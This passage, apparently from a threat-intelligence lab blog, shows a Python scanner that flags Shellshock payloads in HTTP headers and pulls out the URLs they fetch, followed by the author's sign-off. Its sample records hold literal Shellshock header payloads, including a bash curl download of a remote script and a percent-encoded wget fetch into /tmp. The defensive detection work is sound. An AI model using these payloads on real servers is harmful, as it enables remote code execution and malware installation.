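SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Anything curl/wget would fetch from inside the payload.
URL_RE = re.compile(r"https?://[^\s'\"<>;|&]+")

# Constructed request records: source, path and the headers that CGI exports
# as environment variables (any header can be abused, so all are scanned).
REQUESTS = [
    {"src": "14.163.12.119", "path": "/cgi-bin/stats.cgi",
     "headers": {"User-Agent": "() { :;}; /bin/bash -c '/usr/bin/env curl -s "
                               "http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm"}},
    {"src": "198.51.100.7", "path": "/index.html",
     "headers": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
                 "Referer": "http://example.net/"}},
    {"src": "203.0.113.5", "path": "/cgi-bin/test.cgi",
     "headers": {"Cookie": "(){%20:;};%20/usr/bin/wget%20http://203.0.113.5/x.sh%20-O%20/tmp/x"}},
    {"src": "192.0.2.9", "path": "/cgi-bin/a.cgi",
     "headers": {"Referer": "() { ignored;}; echo vulnerable"}},
]


def shellshock_headers(headers):
    """Return [(header name, decoded value)] for every header carrying the pattern."""
    found = []
    for name, value in headers.items():
        decoded = unquote(value)  # catch percent-encoded variants too
        if SHELLSHOCK_RE.search(decoded):
            found.append((name, decoded))
    return found


def payload_urls(value):
    """URLs the payload tries to fetch; candidates for blocking/sinkholing."""
    return URL_RE.findall(value)


def scan(requests):
    """One alert per abused header: source, path, header name, fetched URLs."""
    alerts = []
    for r in requests:
        for name, decoded in shellshock_headers(r["headers"]):
            alerts.append({"src": r["src"], "path": r["path"],
                           "header": name, "urls": payload_urls(decoded)})
    return alerts


if __name__ == "__main__":
    for a in scan(REQUESTS):
        print(f"{a['src']} {a['path']} via {a['header']}: fetches {a['urls'] or 'nothing'}")
```

Three of the four records come back: the report's curl fetch, the percent-encoded wget variant in a Cookie header, and a bare probe that fetches nothing (the kind of reconnaissance the report says dominated the first days). The benign browser request is left alone even though its Referer is a URL. A real deployment would read the web server's access log or a WAF feed instead of the inline list.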

------------------------------------------------------

I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).

This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.

Have a great weekend!
Jeff